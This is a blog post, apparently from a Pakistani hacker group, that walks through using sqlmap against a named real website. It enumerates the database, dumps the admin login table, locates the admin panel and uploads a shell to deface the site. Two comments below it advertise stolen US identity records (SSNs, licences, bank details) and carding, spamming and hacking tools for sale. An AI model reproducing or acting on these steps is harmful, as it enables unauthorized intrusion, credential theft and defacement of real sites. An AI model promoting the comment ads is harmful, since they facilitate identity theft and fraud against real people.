How to HaCk a Website with Sqlmap

How to HaCk a Website with Sqlmap..




Asalam U Alikum Friends Umi here from PCMH Today going to show U how to get access to a website Website with sqlmap 
U can also use sqlmap in backtrack but if  u are using window then install it  ..link below

Follow my steps Frist Download sqlmap and python >>>> 

Download the Sqlmap Here  

Download python for windows required !! 


Step 1# Download python and install it

Step 2# Download the Sqlmap and extract it in ..

C:\Users\username


For example C:\Users\Umi





Step 3# Find a Vulnerable Site For Example like this ..

http://www.techs.pk/news_events_detail.php?id=11'

Step 4# Now open run >> type cmd hit enter ...

Step 5# NOw type cd Sqlmap .. like this ..





Step 6# to find the database of a site type >>

Sqlmap.py -u "site?" --dbs

-u is used to denote the url and --dbs is used to find database of sites ..



Step 6# Now if the site is Vulnerable it will Find the database like this ...




Step 7# Now we have to find tables to do that type >>


Sqlmap.py -u "site?" -D database name --tables

For Example


Sqlmap.py -u http://www.techs.pk/news_events_detail.php?id=11 -D phase_iv --tables


This will show u All the tables of the database like this






Step 8# Now to Find columns type this >>>


Sqlmap.py -u "site?" -D database name -T "table_name" --columns 

For example : 


sqlmap.py -u http://www.techs.pk/news_events_detail.php?id=11 -D phase_iv -T login --columns 



Result : 






Step 9# Now we have found the database,tables and columns Now we have to dump columns to get username,pass etc ..
to do that type >>


Sqlmap.py -u "site" -D database name -T "table_name" -C "column_name" --dump 


For Example :

sqlmap.py -u http://www.techs.pk/news_events_detail.php?id=11 -D phase_iv -T login -C admin,email,pass --dump

Result :



step 10# Now we just have to find the adminpanel to do that use my admin finder download here or u can search it in google Online adminfinder  ..



Note : AdminFinder wont work unless u have perl install in ur window U can also use adminfinder in backtrack ...

But If u want to use adminfinder then

Download Perl here

Step 11# login >> now to deface the site Upload ur  shell Deface website Done .. 

Video tutorial can be found here

Note : Some websites  can't be defaced ..

Code Injector | Kai HaXor | Immi HaXor | Dr.Virus Bilal | Pak Cyber Mafia Hackers | All Paki Groups |

2 comments:

  1. Hello Everyone !

    USA SSN Leads/Dead Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  2. **HACKING TOOLS WITH TUTORIALS & FULLZ AVAILABLE**
    (High Quality, Genuine Seller)

    =>Contact 24/7<=
    Telegram> @leadsupplier
    ICQ> 752822040

    Fullz info included
    NAME+SSN+DOB+DL+DL-STATE+ADDRESS
    Employee & Bank details included
    High credit fullz with DL 700+
    (bulk order negotiable)
    **Payment in all crypto currencies will be accepted**

    ->You can buy few for testing
    ->Invalid or wrong info will be replaced
    ->Serious buyers needed for long term

    TOOLS & TUTORIALS AVAILABLE FOR:

    "SPAMMING" "HACKING" "CARDING" "CASH OUT"
    "KALI LINUX" "BLOCKCHAIN BLUE PRINTS"

    **TOOLS & TUTORIALS LIST**

    ->Ethical Hacking Tools & Tutorials
    ->Kali Linux
    ->Keylogger & Keystroke Logger
    ->Facebook & Google Hacking
    ->Bitcoin Flasher
    ->SQL Injector
    ->Paypal Logins
    ->Bitcoin Cracker
    ->SMTP Linux Root
    ->DUMPS with pins track 1 and 2
    ->SMTP's, Safe Socks, Rdp's brute, VPN
    ->Php mailer
    ->SMS Sender & Email Blaster
    ->Cpanel
    ->Server I.P's & Proxies
    ->Viruses
    ->Premium Accounts (netflix cracker, paypal logins, pornhub, amazon)
    ->HQ Email Combo

    If you are searching for a valid vendor, it's very prime chance.
    You'll never be disappointed.
    **You should try at least once**

    Contact 24/7
    Telegram> @leadsupplier
    ICQ> 752822040

    ReplyDelete